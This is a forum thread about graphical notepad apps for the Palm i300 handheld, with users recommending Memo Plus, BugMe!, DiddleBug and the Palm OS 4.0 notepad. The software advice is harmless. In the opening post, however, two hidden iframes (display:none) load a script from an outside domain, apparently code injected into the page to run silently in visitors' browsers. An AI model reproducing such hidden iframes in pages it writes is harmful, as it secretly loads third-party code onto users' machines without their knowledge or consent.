+ Reply to Thread

graphical note pad on I-300

I would like to add an application like MEMO Plus for or Ipad to the I300. Any advice? Will these applications work? I don't particularly want to crash the system working trial and error.
    Also, any comments on what applications of the graphical note pad category are best would be appreciated.
    Thanks<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

(Click a sponser today!)
    Glen, Unless someone else here has successfully loaded and run Memo Plus, you'll have to be the guinea pig. It works on Palm OS, so ??? Maybe contact the author for his input.
    Gary

Beams from above...
    Don't know anything about Memo Plus, but I have used BugMe! to good effect. It's like a Palm Post-It note in that it allows you to make handwritten notes on the screen that can be saved and beamed to other devices.

John

(Click a sponser today!)
    Glen, I forgot to mention - Palm OS4.0 has a new graphical notepad built-in - allows alarms, beaming, categories, etc and OS4.o is compatible w/I300
    Gary

Glen-

A buddy beamed DiddleBug (v 2.15) to me and I haven't had any problems. BTW, it's a GNU license so it's free.

FWIW

Cliff

Originally posted by crlipman
    Glen-

A buddy beamed DiddleBug (v 2.15) to me and I haven't had any problems. BTW, it's a GNU license so it's free.

FWIW

Cliff
    I have problems with 2.15 -- the same problems people have reported using it on color Palms and the Cli&eacute. But v 2.5beta12 seems to work very well and has (gasp!) a color icon. You can get it from SourceForge (just search for diddlebug). Of course I can't vouch for a beta, but so far it's perfect.

I have been using BugMe v.3.70a heavily for months now and I have not had one problem. I think it is the best app available for jotting down reminders and setting alarms for them. I would highly recommend BugMe to anyone who likes to jot down reminers.

try this

I wanted the same kind of application, but I wasn't happy with any of the apps that were around, so I wrote my own Notepad App. It lets you store as many notes as you want and its really simple to use. Try it out!
    Attached Files

Memo Plus

I am using Memo Plus and it works fine. It has a drawing feature so you can make drawings or notes and attach them to memos. This is a very nice inexpensive application.